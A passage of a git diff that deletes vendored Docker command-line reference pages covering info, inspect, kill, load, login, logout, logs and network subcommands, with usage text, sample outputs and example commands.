[secret ls](secret_ls.md) | List secrets in the swarm | -| [secret rm](secret_rm.md) | Remove the specified secrets from the swarm | - -### Swarm stack commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [stack deploy](stack_deploy.md) | Deploy a new stack or update an existing stack | -| [stack ls](stack_ls.md) | List stacks in the swarm | -| [stack ps](stack_ps.md) | List the tasks in the stack | -| [stack rm](stack_rm.md) | Remove the stack from the swarm | -| [stack services](stack_services.md) | List the services in the stack | - -### Plugin commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [plugin create](plugin_create.md) | Create a plugin from a rootfs and configuration | -| [plugin disable](plugin_disable.md) | Disable a plugin | -| [plugin enbale](plugin_enable.md) | Enable a plugin | -| [plugin inspect](plugin_inspect.md) | Display detailed information on a plugin | -| [plugin install](plugin_install.md) | Install a plugin | -| [plugin ls](plugin_ls.md) | List plugins | -| [plugin push](plugin_push.md) | Push a plugin to a registry | -| [plugin rm](plugin_rm.md) | Remove a plugin | -| [plugin set](plugin_set.md) | Change settings for a plugin | diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/info.md b/vendor/github.com/docker/docker/docs/reference/commandline/info.md deleted file mode 100644 index 50a084fcb2..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/info.md +++ /dev/null @@ -1,224 +0,0 @@ ---- -title: "info" -description: "The info command description and usage" -keywords: "display, docker, information" ---- - - - -# info - -```markdown -Usage: docker info [OPTIONS] - -Display system-wide information - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -This command displays system wide information regarding the Docker installation. -Information displayed includes the kernel version, number of containers and images. -The number of images shown is the number of unique images. The same image tagged -under different names is counted only once. - -If a format is specified, the given template will be executed instead of the -default format. Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -Depending on the storage driver in use, additional information can be shown, such -as pool name, data file, metadata file, data space used, total data space, metadata -space used, and total metadata space. - -The data file is where the images are stored and the metadata file is where the -meta data regarding those images are stored. When run for the first time Docker -allocates a certain amount of data space and meta data space from the space -available on the volume where `/var/lib/docker` is mounted. - -# Examples - -## Display Docker system information - -Here is a sample output for a daemon running on Ubuntu, using the overlay2 -storage driver and a node that is part of a 2-node swarm: - - $ docker -D info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Images: 52 - Server Version: 1.13.0 - Storage Driver: overlay2 - Backing Filesystem: extfs - Supports d_type: true - Native Overlay Diff: false - Logging Driver: json-file - Cgroup Driver: cgroupfs - Plugins: - Volume: local - Network: bridge host macvlan null overlay - Swarm: active - NodeID: rdjq45w1op418waxlairloqbm - Is Manager: true - ClusterID: te8kdyw33n36fqiz74bfjeixd - Managers: 1 - Nodes: 2 - Orchestration: - Task History Retention Limit: 5 - Raft: - Snapshot Interval: 10000 - Number of Old Snapshots to Retain: 0 - Heartbeat Tick: 1 - Election Tick: 3 - Dispatcher: - Heartbeat Period: 5 seconds - CA Configuration: - Expiry Duration: 3 months - Node Address: 172.16.66.128 172.16.66.129 - Manager Addresses: - 172.16.66.128:2477 - Runtimes: runc - Default Runtime: runc - Init Binary: docker-init - containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 - runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 - init version: N/A (expected: v0.13.0) - Security Options: - apparmor - seccomp - Profile: default - Kernel Version: 4.4.0-31-generic - Operating System: Ubuntu 16.04.1 LTS - OSType: linux - Architecture: x86_64 - CPUs: 2 - Total Memory: 1.937 GiB - Name: ubuntu - ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 - Docker Root Dir: /var/lib/docker - Debug Mode (client): true - Debug Mode (server): true - File Descriptors: 30 - Goroutines: 123 - System Time: 2016-11-12T17:24:37.955404361-08:00 - EventsListeners: 0 - Http Proxy: http://test:test@proxy.example.com:8080 - Https Proxy: https://test:test@proxy.example.com:8080 - No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com - Registry: https://index.docker.io/v1/ - WARNING: No swap limit support - Labels: - storage=ssd - staging=true - Experimental: false - Insecure Registries: - 127.0.0.0/8 - Registry Mirrors: - http://192.168.1.2/ - http://registry-mirror.example.com:5000/ - Live Restore Enabled: false - -The global `-D` option tells all `docker` commands to output debug information. - -The example below shows the output for a daemon running on Red Hat Enterprise Linux, -using the devicemapper storage driver. As can be seen in the output, additional -information about the devicemapper storage driver is shown: - - $ docker info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Images: 52 - Server Version: 1.10.3 - Storage Driver: devicemapper - Pool Name: docker-202:2-25583803-pool - Pool Blocksize: 65.54 kB - Base Device Size: 10.74 GB - Backing Filesystem: xfs - Data file: /dev/loop0 - Metadata file: /dev/loop1 - Data Space Used: 1.68 GB - Data Space Total: 107.4 GB - Data Space Available: 7.548 GB - Metadata Space Used: 2.322 MB - Metadata Space Total: 2.147 GB - Metadata Space Available: 2.145 GB - Udev Sync Supported: true - Deferred Removal Enabled: false - Deferred Deletion Enabled: false - Deferred Deleted Device Count: 0 - Data loop file: /var/lib/docker/devicemapper/devicemapper/data - Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata - Library Version: 1.02.107-RHEL7 (2015-12-01) - Execution Driver: native-0.2 - Logging Driver: json-file - Plugins: - Volume: local - Network: null host bridge - Kernel Version: 3.10.0-327.el7.x86_64 - Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) - OSType: linux - Architecture: x86_64 - CPUs: 1 - Total Memory: 991.7 MiB - Name: ip-172-30-0-91.ec2.internal - ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S - Docker Root Dir: /var/lib/docker - Debug mode (client): false - Debug mode (server): false - Username: gordontheturtle - Registry: https://index.docker.io/v1/ - Insecure registries: - myinsecurehost:5000 - 127.0.0.0/8 - -You can also specify the output format: - - $ docker info --format '{{json .}}' - {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} - -Here is a sample output for a daemon running on Windows Server 2016: - - E:\docker>docker info - Containers: 1 - Running: 0 - Paused: 0 - Stopped: 1 - Images: 17 - Server Version: 1.13.0 - Storage Driver: windowsfilter - Windows: - Logging Driver: json-file - Plugins: - Volume: local - Network: nat null overlay - Swarm: inactive - Default Isolation: process - Kernel Version: 10.0 14393 (14393.206.amd64fre.rs1_release.160912-1937) - Operating System: Windows Server 2016 Datacenter - OSType: windows - Architecture: x86_64 - CPUs: 8 - Total Memory: 3.999 GiB - Name: WIN-V0V70C0LU5P - ID: NYMS:B5VK:UMSL:FVDZ:EWB5:FKVK:LPFL:FJMQ:H6FT:BZJ6:L2TD:XH62 - Docker Root Dir: C:\control - Debug Mode (client): false - Debug Mode (server): false - Registry: https://index.docker.io/v1/ - Insecure Registries: - 127.0.0.0/8 - Registry Mirrors: - http://192.168.1.2/ - http://registry-mirror.example.com:5000/ - Live Restore Enabled: false diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md deleted file mode 100644 index 7a0c3a0871..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md +++ /dev/null @@ -1,102 +0,0 @@ ---- -title: "inspect" -description: "The inspect command description and usage" -keywords: "inspect, container, json" ---- - - - -# inspect - -```markdown -Usage: docker inspect [OPTIONS] NAME|ID [NAME|ID...] - -Return low-level information on Docker object(s) (e.g. container, image, volume, -network, node, service, or task) identified by name or ID - -Options: - -f, --format Format the output using the given Go template - --help Print usage - -s, --size Display total file sizes if the type is container - --type Return JSON for specified type -``` - -By default, this will render all results in a JSON array. If the container and -image have the same name, this will return container JSON for unspecified type. -If a format is specified, the given template will be executed for each result. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -## Examples - -**Get an instance's IP address:** - -For the most part, you can pick out any field from the JSON in a fairly -straightforward manner. - - {% raw %} - $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $INSTANCE_ID - {% endraw %} - -**Get an instance's MAC address:** - -For the most part, you can pick out any field from the JSON in a fairly -straightforward manner. - - {% raw %} - $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.MacAddress}}{{end}}' $INSTANCE_ID - {% endraw %} - -**Get an instance's log path:** - - {% raw %} - $ docker inspect --format='{{.LogPath}}' $INSTANCE_ID - {% endraw %} - -**Get a Task's image name:** - - {% raw %} - $ docker inspect --format='{{.Container.Spec.Image}}' $INSTANCE_ID - {% endraw %} - -**List all port bindings:** - -One can loop over arrays and maps in the results to produce simple text -output: - - {% raw %} - $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' $INSTANCE_ID - {% endraw %} - -**Find a specific port mapping:** - -The `.Field` syntax doesn't work when the field name begins with a -number, but the template language's `index` function does. The -`.NetworkSettings.Ports` section contains a map of the internal port -mappings to a list of external address/port objects. To grab just the -numeric public port, you use `index` to find the specific port map, and -then `index` 0 contains the first object inside of that. Then we ask for -the `HostPort` field to get the public address. - - {% raw %} - $ docker inspect --format='{{(index (index .NetworkSettings.Ports "8787/tcp") 0).HostPort}}' $INSTANCE_ID - {% endraw %} - -**Get a subsection in JSON format:** - -If you request a field which is itself a structure containing other -fields, by default you get a Go-style dump of the inner values. -Docker adds a template function, `json`, which can be applied to get -results in JSON format. - - {% raw %} - $ docker inspect --format='{{json .Config}}' $INSTANCE_ID - {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md deleted file mode 100644 index 32fde3d8b5..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md +++ /dev/null @@ -1,34 +0,0 @@ ---- -title: "kill" -description: "The kill command description and usage" -keywords: "container, kill, signal" ---- - - - -# kill - -```markdown -Usage: docker kill [OPTIONS] CONTAINER [CONTAINER...] - -Kill one or more running containers - -Options: - --help Print usage - -s, --signal string Signal to send to the container (default "KILL") -``` - -The main process inside the container will be sent `SIGKILL`, or any -signal specified with option `--signal`. - -> **Note:** -> `ENTRYPOINT` and `CMD` in the *shell* form run as a subcommand of `/bin/sh -c`, -> which does not pass signals. This means that the executable is not the container’s PID 1 -> and does not receive Unix signals. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/load.md b/vendor/github.com/docker/docker/docs/reference/commandline/load.md deleted file mode 100644 index 04a5bc7e56..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/load.md +++ /dev/null @@ -1,53 +0,0 @@ ---- -title: "load" -description: "The load command description and usage" -keywords: "stdin, tarred, repository" ---- - - - -# load - -```markdown -Usage: docker load [OPTIONS] - -Load an image from a tar archive or STDIN - -Options: - --help Print usage - -i, --input string Read from tar archive file, instead of STDIN. - The tarball may be compressed with gzip, bzip, or xz - -q, --quiet Suppress the load output but still outputs the imported images -``` - -Loads a tarred repository from a file or the standard input stream. -Restores both images and tags. - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - $ docker load < busybox.tar.gz - # […] - Loaded image: busybox:latest - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - $ docker load --input fedora.tar - # […] - Loaded image: fedora:rawhide - # […] - Loaded image: fedora:20 - # […] - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest 769b9341d937 7 weeks ago 2.489 MB - fedora rawhide 0d20aec6529d 7 weeks ago 387 MB - fedora 20 58394af37342 7 weeks ago 385.5 MB - fedora heisenbug 58394af37342 7 weeks ago 385.5 MB - fedora latest 58394af37342 7 weeks ago 385.5 MB diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/login.md b/vendor/github.com/docker/docker/docs/reference/commandline/login.md deleted file mode 100644 index a0f35fd4d0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/login.md +++ /dev/null @@ -1,122 +0,0 @@ ---- -title: "login" -description: "The login command description and usage" -keywords: "registry, login, image" ---- - - - -# login - -```markdown -Usage: docker login [OPTIONS] [SERVER] - -Log in to a Docker registry. -If no server is specified, the default is defined by the daemon. - -Options: - --help Print usage - -p, --password string Password - -u, --username string Username -``` - -If you want to login to a self-hosted registry you can specify this by -adding the server name. - - example: - $ docker login localhost:8080 - - -`docker login` requires user to use `sudo` or be `root`, except when: - -1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. -2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/security/security/#docker-daemon-attack-surface) for details. - -You can log into any public or private repository for which you have -credentials. When you log in, the command stores encoded credentials in -`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. - -## Credentials store - -The Docker Engine can keep user credentials in an external credentials store, -such as the native keychain of the operating system. Using an external store -is more secure than storing credentials in the Docker configuration file. - -To use a credentials store, you need an external helper program to interact -with a specific keychain or external store. Docker requires the helper -program to be in the client's host `$PATH`. - -This is the list of currently available credentials helpers and where -you can download them from: - -- D-Bus Secret Service: https://github.com/docker/docker-credential-helpers/releases -- Apple macOS keychain: https://github.com/docker/docker-credential-helpers/releases -- Microsoft Windows Credential Manager: https://github.com/docker/docker-credential-helpers/releases - -### Usage - -You need to specify the credentials store in `$HOME/.docker/config.json` -to tell the docker engine to use it: - -```json -{ - "credsStore": "osxkeychain" -} -``` - -If you are currently logged in, run `docker logout` to remove -the credentials from the file and run `docker login` again. - -### Protocol - -Credential helpers can be any program or script that follows a very simple protocol. -This protocol is heavily inspired by Git, but it differs in the information shared. - -The helpers always use the first argument in the command to identify the action. -There are only three possible values for that argument: `store`, `get`, and `erase`. - -The `store` command takes a JSON payload from the standard input. That payload carries -the server address, to identify the credential, the user name, and either a password -or an identity token. - -```json -{ - "ServerURL": "https://index.docker.io/v1", - "Username": "david", - "Secret": "passw0rd1" -} -``` - -If the secret being stored is an identity token, the Username should be set to -``. - -The `store` command can write error messages to `STDOUT` that the docker engine -will show if there was an issue. - -The `get` command takes a string payload from the standard input. That payload carries -the server address that the docker engine needs credentials for. This is -an example of that payload: `https://index.docker.io/v1`. - -The `get` command writes a JSON payload to `STDOUT`. Docker reads the user name -and password from this payload: - -```json -{ - "Username": "david", - "Secret": "passw0rd1" -} -``` - -The `erase` command takes a string payload from `STDIN`. That payload carries -the server address that the docker engine wants to remove credentials for. This is -an example of that payload: `https://index.docker.io/v1`. - -The `erase` command can write error messages to `STDOUT` that the docker engine -will show if there was an issue. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md deleted file mode 100644 index 1635e2244b..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md +++ /dev/null @@ -1,30 +0,0 @@ ---- -title: "logout" -description: "The logout command description and usage" -keywords: "logout, docker, registry" ---- - - - -# logout - -```markdown -Usage: docker logout [SERVER] - -Log out from a Docker registry. -If no server is specified, the default is defined by the daemon. - -Options: - --help Print usage -``` - -For example: - - $ docker logout localhost:8080 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md deleted file mode 100644 index 891e10b55c..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md +++ /dev/null @@ -1,66 +0,0 @@ ---- -title: "logs" -description: "The logs command description and usage" -keywords: "logs, retrieve, docker" ---- - - - -# logs - -```markdown -Usage: docker logs [OPTIONS] CONTAINER - -Fetch the logs of a container - -Options: - --details Show extra details provided to logs - -f, --follow Follow log output - --help Print usage - --since string Show logs since timestamp - --tail string Number of lines to show from the end of the logs (default "all") - -t, --timestamps Show timestamps -``` - -The `docker logs` command batch-retrieves logs present at the time of execution. - -> **Note**: this command is only functional for containers that are started with -> the `json-file` or `journald` logging driver. - -For more information about selecting and configuring logging drivers, refer to -[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). - -The `docker logs --follow` command will continue streaming the new output from -the container's `STDOUT` and `STDERR`. - -Passing a negative number or a non-integer to `--tail` is invalid and the -value is set to `all` in that case. - -The `docker logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) -, for example `2014-09-16T06:17:46.000000000Z`, to each -log entry. To ensure that the timestamps are aligned the -nano-second part of the timestamp will be padded with zero when necessary. - -The `docker logs --details` command will add on extra attributes, such as -environment variables and labels, provided to `--log-opt` when creating the -container. - -The `--since` option shows only the container logs generated after -a given date. You can specify the date as an RFC 3339 date, a UNIX -timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date -format you may also use RFC3339Nano, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. You can combine the -`--since` option with either or both of the `--follow` or `--tail` options. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md deleted file mode 100644 index d58afacd76..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md +++ /dev/null @@ -1,28 +0,0 @@ ---- -title: "Command line reference" -description: "Docker's CLI command description and usage" -keywords: "Docker, Docker documentation, CLI, command line" -identifier: "smn_cli" ---- - - - -# The Docker commands - -This section contains reference information on using Docker's command line -client. Each command has a reference page along with samples. If you are -unfamiliar with the command line, you should start by reading about how to -[Use the Docker command line](cli.md). - -You start the Docker daemon with the command line. How you start the daemon -affects your Docker containers. For that reason you should also make sure to -read the [`dockerd`](dockerd.md) reference page. - -For a list of Docker commands see [Command line reference guide](index.md). diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md deleted file mode 100644 index 52459a5d5f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md +++ /dev/null @@ -1,100 +0,0 @@ ---- -title: "network connect" -description: "The network connect command description and usage" -keywords: "network, connect, user-defined" ---- - - - -# network connect - -```markdown -Usage: docker network connect [OPTIONS] NETWORK CONTAINER - -Connect a container to a network - -Options: - --alias value Add network-scoped alias for the container (default []) - --help Print usage - --ip string IP Address - --ip6 string IPv6 Address - --link value Add link to another container (default []) - --link-local-ip value Add a link-local address for the container (default []) -``` - -Connects a container to a network. You can connect a container by name -or by ID. Once connected, the container can communicate with other containers in -the same network. - -```bash -$ docker network connect multi-host-network container1 -``` - -You can also use the `docker run --network=` option to start a container and immediately connect it to a network. - -```bash -$ docker run -itd --network=multi-host-network busybox -``` - -You can specify the IP address you want to be assigned to the container's interface. - -```bash -$ docker network connect --ip 10.10.36.122 multi-host-network container2 -``` - -You can use `--link` option to link another container with a preferred alias - -```bash -$ docker network connect --link container1:c1 multi-host-network container2 -``` - -`--alias` option can be used to resolve the container by another name in the network -being connected to. - -```bash -$ docker network connect --alias db --alias mysql multi-host-network container2 -``` -You can pause, restart, and stop containers that are connected to a network. -A container connects to its configured networks when it runs. - -If specified, the container's IP address(es) is reapplied when a stopped -container is restarted. If the IP address is no longer available, the container -fails to start. One way to guarantee that the IP address is available is -to specify an `--ip-range` when creating the network, and choose the static IP -address(es) from outside that range. This ensures that the IP address is not -given to another container while this container is not on the network. - -```bash -$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network -``` - -```bash -$ docker network connect --ip 172.20.128.2 multi-host-network container2 -``` - -To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. - -Once connected in network, containers can communicate using only another -container's IP address or name. For `overlay` networks or custom plugins that -support multi-host connectivity, containers connected to the same multi-host -network but launched from different Engines can also communicate in this way. - -You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks. - -## Related information - -* [network inspect](network_inspect.md) -* [network create](network_create.md) -* [network disconnect](network_disconnect.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) -* [Work with networks](https://docs.docker.com/engine/userguide/networking/work-with-networks/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md deleted file mode 100644 index e238217d41..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md +++ /dev/null @@ -1,202 +0,0 @@ ---- -title: "network create" -description: "The network create command description and usage" -keywords: "network, create" ---- - - - -# network create - -```markdown -Usage: docker network create [OPTIONS] NETWORK - -Create a network - -Options: - --attachable Enable manual container attachment - --aux-address value Auxiliary IPv4 or IPv6 addresses used by Network - driver (default map[]) - -d, --driver string Driver to manage the Network (default "bridge") - --gateway value IPv4 or IPv6 Gateway for the master subnet (default []) - --help Print usage - --internal Restrict external access to the network - --ip-range value Allocate container ip from a sub-range (default []) - --ipam-driver string IP Address Management Driver (default "default") - --ipam-opt value Set IPAM driver specific options (default map[]) - --ipv6 Enable IPv6 networking - --label value Set metadata on a network (default []) - -o, --opt value Set driver specific options (default map[]) - --subnet value Subnet in CIDR format that represents a - network segment (default []) -``` - -Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the -built-in network drivers. If you have installed a third party or your own custom -network driver you can specify that `DRIVER` here also. If you don't specify the -`--driver` option, the command automatically creates a `bridge` network for you. -When you install Docker Engine it creates a `bridge` network automatically. This -network corresponds to the `docker0` bridge that Engine has traditionally relied -on. When you launch a new container with `docker run` it automatically connects to -this bridge network. You cannot remove this default bridge network, but you can -create new ones using the `network create` command. - -```bash -$ docker network create -d bridge my-bridge-network -``` - -Bridge networks are isolated networks on a single Engine installation. If you -want to create a network that spans multiple Docker hosts each running an -Engine, you must create an `overlay` network. Unlike `bridge` networks, overlay -networks require some pre-existing conditions before you can create one. These -conditions are: - -* Access to a key-value store. Engine supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores. -* A cluster of hosts with connectivity to the key-value store. -* A properly configured Engine `daemon` on each host in the cluster. - -The `dockerd` options that support the `overlay` network are: - -* `--cluster-store` -* `--cluster-store-opt` -* `--cluster-advertise` - -To read more about these options and how to configure them, see ["*Get started -with multi-host network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay). - -While not required, it is a good idea to install Docker Swarm to -manage the cluster that makes up your network. Swarm provides sophisticated -discovery and server management tools that can assist your implementation. - -Once you have prepared the `overlay` network prerequisites you simply choose a -Docker host in the cluster and issue the following to create the network: - -```bash -$ docker network create -d overlay my-multihost-network -``` - -Network names must be unique. The Docker daemon attempts to identify naming -conflicts but this is not guaranteed. It is the user's responsibility to avoid -name conflicts. - -## Connect containers - -When you start a container, use the `--network` flag to connect it to a network. -This example adds the `busybox` container to the `mynet` network: - -```bash -$ docker run -itd --network=mynet busybox -``` - -If you want to add a container to a network after the container is already -running, use the `docker network connect` subcommand. - -You can connect multiple containers to the same network. Once connected, the -containers can communicate using only another container's IP address or name. -For `overlay` networks or custom plugins that support multi-host connectivity, -containers connected to the same multi-host network but launched from different -Engines can also communicate in this way. - -You can disconnect a container from a network using the `docker network -disconnect` command. - -## Specifying advanced options - -When you create a network, Engine creates a non-overlapping subnetwork for the -network by default. This subnetwork is not a subdivision of an existing -network. It is purely for ip-addressing purposes. You can override this default -and specify subnetwork values directly using the `--subnet` option. On a -`bridge` network you can only create a single subnet: - -```bash -$ docker network create --driver=bridge --subnet=192.168.0.0/16 br0 -``` - -Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address` -options. - -```bash -$ docker network create \ - --driver=bridge \ - --subnet=172.28.0.0/16 \ - --ip-range=172.28.5.0/24 \ - --gateway=172.28.5.254 \ - br0 -``` - -If you omit the `--gateway` flag the Engine selects one for you from inside a -preferred pool. For `overlay` networks and for network driver plugins that -support it you can create multiple subnetworks. - -```bash -$ docker network create -d overlay \ - --subnet=192.168.0.0/16 \ - --subnet=192.170.0.0/16 \ - --gateway=192.168.0.100 \ - --gateway=192.170.0.100 \ - --ip-range=192.168.1.0/24 \ - --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ - --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ - my-multihost-network -``` - -Be sure that your subnetworks do not overlap. If they do, the network create -fails and Engine returns an error. - -# Bridge driver options - -When creating a custom network, the default network driver (i.e. `bridge`) has -additional options that can be passed. The following are those options and the -equivalent docker daemon flags used for docker0 bridge: - -| Option | Equivalent | Description | -|--------------------------------------------------|-------------|-------------------------------------------------------| -| `com.docker.network.bridge.name` | - | bridge name to be used when creating the Linux bridge | -| `com.docker.network.bridge.enable_ip_masquerade` | `--ip-masq` | Enable IP masquerading | -| `com.docker.network.bridge.enable_icc` | `--icc` | Enable or Disable Inter Container Connectivity | -| `com.docker.network.bridge.host_binding_ipv4` | `--ip` | Default IP when binding container ports | -| `com.docker.network.driver.mtu` | `--mtu` | Set the containers network MTU | - -The following arguments can be passed to `docker network create` for any -network driver, again with their approximate equivalents to `docker daemon`. - -| Argument | Equivalent | Description | -|--------------|----------------|--------------------------------------------| -| `--gateway` | - | IPv4 or IPv6 Gateway for the master subnet | -| `--ip-range` | `--fixed-cidr` | Allocate IPs from a range | -| `--internal` | - | Restrict external access to the network | -| `--ipv6` | `--ipv6` | Enable IPv6 networking | -| `--subnet` | `--bip` | Subnet for network | - -For example, let's use `-o` or `--opt` options to specify an IP address binding -when publishing ports: - -```bash -$ docker network create \ - -o "com.docker.network.bridge.host_binding_ipv4"="172.19.0.1" \ - simple-network -``` - -### Network internal mode - -By default, when you connect a container to an `overlay` network, Docker also -connects a bridge network to it to provide external connectivity. If you want -to create an externally isolated `overlay` network, you can specify the -`--internal` option. - -## Related information - -* [network inspect](network_inspect.md) -* [network connect](network_connect.md) -* [network disconnect](network_disconnect.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md deleted file mode 100644 index 42e976a500..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: "network disconnect" -description: "The network disconnect command description and usage" -keywords: "network, disconnect, user-defined" ---- - - - -# network disconnect - -```markdown -Usage: docker network disconnect [OPTIONS] NETWORK CONTAINER - -Disconnect a container from a network - -Options: - -f, --force Force the container to disconnect from a network - --help Print usage -``` - -Disconnects a container from a network. The container must be running to disconnect it from the network. - -```bash - $ docker network disconnect multi-host-network container1 -``` - - -## Related information - -* [network inspect](network_inspect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md deleted file mode 100644 index bc0005e38e..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md +++ /dev/null @@ -1,192 +0,0 @@ ---- -title: "network inspect" -description: "The network inspect command description and usage" -keywords: "network, inspect, user-defined" ---- - - - -# network inspect - -```markdown -Usage: docker network inspect [OPTIONS] NETWORK [NETWORK...] - -Display detailed information on one or more networks - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: - -```bash -$ sudo docker run -itd --name=container1 busybox -f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 - -$ sudo docker run -itd --name=container2 busybox -bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 -``` - -The `network inspect` command shows the containers, by id, in its -results. For networks backed by multi-host network driver, such as Overlay, -this command also shows the container endpoints in other hosts in the -cluster. These endpoints are represented as "ep-{endpoint-id}" in the output. -However, for swarm-scoped networks, only the endpoints that are local to the -node are shown. - -You can specify an alternate format to execute a given -template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package describes all the -details of the format. - -```bash -$ sudo docker network inspect bridge -[ - { - "Name": "bridge", - "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", - "Created": "2016-10-19T04:33:30.360899459Z", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.17.42.1/16", - "Gateway": "172.17.42.1" - } - ] - }, - "Internal": false, - "Containers": { - "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { - "Name": "container2", - "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", - "MacAddress": "02:42:ac:11:00:02", - "IPv4Address": "172.17.0.2/16", - "IPv6Address": "" - }, - "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { - "Name": "container1", - "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", - "MacAddress": "02:42:ac:11:00:01", - "IPv4Address": "172.17.0.1/16", - "IPv6Address": "" - } - }, - 